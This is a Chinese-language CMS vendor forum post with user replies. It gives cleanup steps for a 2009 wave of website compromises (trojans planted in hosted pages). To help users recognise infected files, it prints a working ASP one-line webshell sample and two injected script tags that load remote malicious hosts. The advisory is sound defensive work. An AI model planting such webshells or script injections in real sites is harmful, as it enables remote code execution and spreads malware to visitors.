8月24日至26日陆续被挂马的用户查看本贴进行解决!
8月24日起,陆续有用户站点被挂马,经嘉缘工程师们的昼夜努力,最终确定,这次挂马攻击是由江西的一名黑客所为,嘉缘已向公安机关报案,网警已介入调查。现就有关紧急解决办法发布如下:
1.嘉缘商业用户发现有挂马的站点请尽快与嘉缘客服人员联系,嘉缘已安排专门的技术工程师24小时不间断轮班为商业用户检查并清理站点上的木马。
2.由于本次受影响的站点众多,嘉缘人力有限,免费用户嘉缘不提供清马检查等技术服务,望谅解!
3.有一定技术基础、熟悉嘉缘系统文件目录及熟悉html的所有用户注意,在没有得到官方技术支持的情况下,请按照以下办法自行先行解决,如遇到问题可在论坛寻求帮助。
4.强烈谴责这些没有良知、没有公德心,所谓黑客的人。
5.感谢长期支持嘉缘的朋友们,嘉缘的发展离不开各位朋友的支持,我们将一如既往的为用户提供更好的技术服务,再次感谢!
解决办法:
第一步:修改后台路径,凡是被挂马的站点必须修改后台路径,修改目录名称后在后台网站配置里边修改对应的目录名称;
第二步:修改所有管理员的密码,密码由字母大小写特殊符合及数字不规则排列组成,密码长度最好为12位以上;
第三步:打开(8月24日)的站点日志,查找“59.55.175.235”、“59.55.171.180”,查找的结果会出现类似
2009-08-24 10:25:56 W3SVC887146513 220.187.26.66 POST /Admin/Hr/bottum.asp - 80 - 59.55.175.235
在网站空间里找出对应的文件,用记事本打开查看代码,如果文件代码类似下边这样的,那么就是木马文件,立即删除;
<%set ms = server.CreateObject(\"MSScriptControl.ScriptControl.1\")
ms.Language=\"VBScript\"
ms.AddObject \"Response\", Response
ms.AddObject \"request\", request
ms.AddObject \"session\", session
ms.AddObject \"server\", server
ms.AddObject \"application\", application
ms.ExecuteStatement (\"ex\";\"ecute(request(chr(35)))\")%>
<%execute request(\"#\")%>
第四步:重新生成模版,进入后台风格模版---模版方案管理---点网站的模版方案生成,然后在系统相关---清理系统缓存,进行清理模版缓存,如果站点开启了生成静态功能,请随后重新生成所有需要生成的文件;
第五步:清理ASP、JS中的木马代码,打开JS目录里边的文件,查看是否有document.writeln('<script type=\"text/javascript\" language=\"JavaScript\" src=\"http://c%30812.2288.org\" id=\"seraph4script2429\"><\/script>');
document.writeln('<script id=\"seraph3script302\" type=\"text/javascript\" src=\"http://0810.6600.o%72g\" language=\"JavaScript\"><\/script>');这个代码,有的话,删除该字符所在的整行代码,打开站点首页index.asp文件,查看最后一行代码如果是</script>结束的,删除%>之后的所有代码。
第六步:打开网站,浏览各频道页面及部分内容页,看是否还提示有木马提示,如果有提示,说明没有清理完整,可以通过查看源代码来找到被挂的代码,如果页面上没有,应该在JS里边,认真查看所有JS并清理。
清理的过程中如遇到遇到请跟本贴提出,禁止另开新帖,新开帖不予回复!
感谢用户chentaonc 提供详细的被修改文件列表,请对照检查自己网站的对应文件!
http://bbs.yjys.net/thread-21340-1-1.html 二楼将陆续发布更有效的解决办法,以下方法的前提是必须先修改后台管理员密码及路径,此次攻击并非漏洞直接所致,木马不清理,挂马将会继续,所以一定要注意,清理所有木马文件。
方法一:使用FTP下载全站文件,无法下载的文件为木马文件,删除即可。
部分用户站点内的木马文件使用FTP无法正常下载,这个根据空间而定,不是全部都这种情况,站点文件全部可以下载不代表里边没有木马。如下图
无法下载的文件,这些文件在FTP里边部分空间是无法删除的,请联系空间服务商进行删除,只要有一个木马没有被删除,网站继续会被挂马。
FTP无法删除木马的空间,空间服务商可能在空间里边可以搜索到但是看不到这些木马文件,请他们设置文件夹选项,如下图
去掉“隐藏受保护的操作系统文件”前的勾,这样就可以看到木马文件,删除掉即可。
然后挨个清理站点文件上的代码,主要影响的文件有js文件、index.asp文件、模版文件、生成的HTML文件,模版文件请登录后台“模版方案管理页面”,对应方案点击“生成”,提示生成成功后,进入“系统相关----清理系统缓存”。生成的HTML文件不用清理,可以使用后台的生成功能,重新生成文件即可。
方法二:打包下载全站文件,通过文件修改时间查找木马文件,删除空间里的木马即可。独立主机用户可以在服务器上直接在站点目录下查找24号到现在被修改过的所有文件,主要检查js文件、ASP文件以及help开头的图片文件。挨个打开清理木马代码,如果为木马文件的直接删除。T_开头的文件为模版文件,使用方法一里边的办法重新生成即可,html目录下的所有html文件不用检查,直接生成即可。
虚拟主机用户,最好请空间服务商协助打包整站文件,然后下载压缩包后,在本地按照独立主机用户的方法进行检查,切忌不要只删除本地文件里边的木马,一定要删除空间里边的对应木马。
方法三:按照方法一、二查找到木马文件后直接删除,然后用备份程序进行覆盖
如果站点文件在24日前有备份,那么可以使用此方法,前提是要清理所有木马文件,清理木马文件后使用备份的文件进行覆盖。
方法四:联系嘉缘客服人员购买技术服务,由嘉缘技术人员来为您及时清理木马并检查站点安全。
商业用户我们提供及时的木马清理服务,此次挂马的免费用户比较多,技术人员不能一一帮助清理,只能免费提供最有效的解决办法,如需要技术人员人工清理木马请联系客服人员。 1.回复4楼:关闭写入权限可能导致站点部分功能无法运行,可以防止挂马。
2.回复20楼:请检查根目录下inc目录里的Keyboard.js文件。 我的24号被挂现在关闭了写入权限,这样应该不会再被挂吧? 谢谢管理员发表的解决办法,可是没有分析出漏洞所在,那样还没有从根本上解决问题,一旦被人重新发现,还是会殃及池鱼,期待最终的解决办法~~~~ 改了后台目录就没事了吧?好像被挂马的都是没有改后台目录的 速度出补丁 盼盼解答很耐心,非常感谢! 非常感谢,期待能有 补丁出现。 等待补丁出现...